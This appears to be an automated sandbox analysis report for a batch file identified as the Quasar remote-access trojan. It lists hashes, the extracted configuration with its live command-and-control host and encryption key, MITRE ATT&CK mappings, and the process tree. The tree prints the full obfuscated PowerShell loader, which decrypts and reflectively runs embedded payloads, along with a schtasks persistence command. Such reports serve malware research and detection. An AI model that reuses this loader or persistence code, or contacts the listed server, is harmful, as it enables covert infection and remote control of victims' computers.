Overview

overview

10

Static

static

1

server.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    111s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-06-2024 00:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    server.bat

  • Size

    1.8MB

  • MD5

    b1ae3a42e01e54524d7bb03f448aabf4

  • SHA1

    b5c41082ea38b21957c51833c19651b45c4fefda

  • SHA256

    a35daf95a4dbdf04f63d1b41909153783fee7fbc99938f96af5d29f44d7f33f8

  • SHA512

    756e60536b467a81affbf645a92187c345ebe2db86711ff69d15ab92a356f047fbaf198d8fc26595f6d03cdeb1e5ba22ea6415e62f66c2bffc36c736032bb7f4

  • SSDEEP

    24576:S5WRxdQff+tj56I/F+Ldi5+1U7D9zzil7dsnCTFO7UWq/KGIU93Lhwh4HFZTv6Z:ySQnqAg9PNz5CM7UWeFtBt6Z

Score
10/10
quasarvortex grabberexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Vortex Grabber

C2

battery-stripes.gl.at.ply.gg:26129

Mutex

ce3e9119-9be9-4c01-999b-b687359025a7

Attributes
  • encryption_key

    FA1E38D5CB08766F486F72A0AB91AE27E1725C2B

  • install_name

    Runtime Broker.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Runtime Broker

  • subdirectory

    WD

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Executes dropped EXE 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\server.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2992
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eZ/BdGP+hp/INTuCiV0z4Mbns33NZlVZkyKbi1TVuS4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('G/Agi11q4Y0U0lJm5CiH1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mnQuE=New-Object System.IO.MemoryStream(,$param_var); $UKJvP=New-Object System.IO.MemoryStream; $mmFpr=New-Object System.IO.Compression.GZipStream($mnQuE, [IO.Compression.CompressionMode]::Decompress); $mmFpr.CopyTo($UKJvP); $mmFpr.Dispose(); $mnQuE.Dispose(); $UKJvP.Dispose(); $UKJvP.ToArray();}function execute_function($param_var,$param2_var){ $VjnJF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $zbiiw=$VjnJF.EntryPoint; $zbiiw.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\server.bat';$rsijF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\server.bat').Split([Environment]::NewLine);foreach ($CSTbf in $rsijF) { if ($CSTbf.StartsWith(':: ')) { $hKdyd=$CSTbf.Substring(3); break; }}$payloads_var=[string[]]$hKdyd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4468
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WD\Runtime Broker.exe" /rl HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:2388
      • C:\Users\Admin\AppData\Roaming\WD\Runtime Broker.exe
        "C:\Users\Admin\AppData\Roaming\WD\Runtime Broker.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1760
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4092 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:3268

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Scheduled Task/Job

    1
    T1053

    Persistence

    Scheduled Task/Job

    1
    T1053

    Privilege Escalation

    Scheduled Task/Job

    1
    T1053

    Defense Evasion

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Resource Development

    Reconnaissance

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4k3quqdj.23g.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit
    • C:\Users\Admin\AppData\Roaming\WD\Runtime Broker.exe
      Filesize

      442KB

      MD5

      04029e121a0cfa5991749937dd22a1d9

      SHA1

      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

      SHA256

      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

      SHA512

      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

      Download Submit
    • memory/1760-41-0x00007FFEAC100000-0x00007FFEACBC1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/1760-38-0x0000017F58130000-0x0000017F581A6000-memory.dmp
      Filesize

      472KB

      Download
    • memory/1760-37-0x0000017F58060000-0x0000017F580A4000-memory.dmp
      Filesize

      272KB

      Download
    • memory/1760-34-0x00007FFEAC100000-0x00007FFEACBC1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/1760-24-0x00007FFEAC100000-0x00007FFEACBC1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/1760-23-0x00007FFEAC100000-0x00007FFEACBC1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4468-16-0x000002247F780000-0x000002247FAA4000-memory.dmp
      Filesize

      3.1MB

      Download
    • memory/4468-0-0x00007FFEAC103000-0x00007FFEAC105000-memory.dmp
      Filesize

      8KB

      Download
    • memory/4468-15-0x000002247F620000-0x000002247F778000-memory.dmp
      Filesize

      1.3MB

      Download
    • memory/4468-14-0x000002247EB00000-0x000002247EB08000-memory.dmp
      Filesize

      32KB

      Download
    • memory/4468-35-0x00007FFEAC103000-0x00007FFEAC105000-memory.dmp
      Filesize

      8KB

      Download
    • memory/4468-13-0x00007FFEAC100000-0x00007FFEACBC1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4468-36-0x00007FFEAC100000-0x00007FFEACBC1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4468-12-0x00007FFEAC100000-0x00007FFEACBC1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4468-11-0x00007FFEAC100000-0x00007FFEACBC1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4468-39-0x00007FFEAC100000-0x00007FFEACBC1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4468-10-0x000002247E500000-0x000002247E522000-memory.dmp
      Filesize

      136KB

      Download